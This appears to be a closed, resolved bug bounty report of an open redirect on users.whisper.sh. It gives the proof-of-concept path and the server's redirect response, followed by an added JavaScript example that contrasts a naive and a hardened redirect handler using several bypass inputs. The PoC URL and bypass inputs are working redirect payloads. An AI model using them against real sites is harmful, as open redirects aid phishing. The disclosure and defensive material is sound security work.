Open Redirection Found in users.whisper.sh
Vulnerability Details
I found that one of your subdomains users.whisper.sh is vulnerable to open redirection.
POC: `http://users.whisper.sh//google.com/%2f..`
Response:
```
HTTP/1.1 303 See Other
X-Powered-By: Express
Location: //google.com/%2f../
Set-Cookie:
CM; Path=/; HttpOnly
Date: Sat, 19 Aug 2017 14:22:50 GMT
Content-Length: 34
Via: 1.1 google
Redirecting to //google.com/%2f../
```
Report Stats
- Report ID: 261592
- State: Closed
- Substate: resolved
- Upvotes: 8
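
Why the `Location: //google.com/%2f../` value in the response above leaves the site, and one way to constrain such a redirect. This is an added example, not part of the original report or the application's code. It assumes the redirect comes from a handler that echoes the request path back with a trailing slash (the report does not state the cause); all function names are hypothetical.

```javascript
// Added example; function names are hypothetical, not the reported app's code.
const BASE = 'http://users.whisper.sh'; // host taken from the report's PoC

// Origin a browser ends up on when it resolves a Location value against BASE.
function resolvedOrigin(location, base = BASE) {
  return new URL(location, base).origin;
}

// Assumed vulnerable pattern: append "/" to the raw request path and redirect.
// A path starting with "//" becomes a protocol-relative URL in Location.
function naiveTrailingSlashTarget(reqPath) {
  return reqPath.endsWith('/') ? reqPath : reqPath + '/';
}

// Hardened variant for the path portion of a request URL (no query string):
// 1. collapse any leading run of "/" or "\" into a single "/"
//    (browsers treat "\" like "/" for http/https URLs);
// 2. resolve the result the way a browser would and refuse anything whose
//    origin is not our own, falling back to "/".
function safeTrailingSlashTarget(reqPath, base = BASE) {
  let target = reqPath.replace(/^[\/\\]+/, '/');
  if (!target.startsWith('/')) target = '/' + target;
  if (!target.endsWith('/')) target += '/';
  if (new URL(target, base).origin !== new URL(base).origin) return '/';
  return target;
}

// Constructed inputs: the first is the path from the report's PoC.
const samples = ['//google.com/%2f..', '/\\google.com', '/\t/google.com', '/profile'];
for (const p of samples) {
  const naive = naiveTrailingSlashTarget(p);
  const safe = safeTrailingSlashTarget(p);
  console.log(JSON.stringify(p),
    '| naive lands on', resolvedOrigin(naive),
    '| safe lands on', resolvedOrigin(safe), 'via', JSON.stringify(safe));
}
```

The third sample shows why the origin check is kept after normalization: URL parsers strip tabs and newlines, so a leading-slash regex alone would miss it.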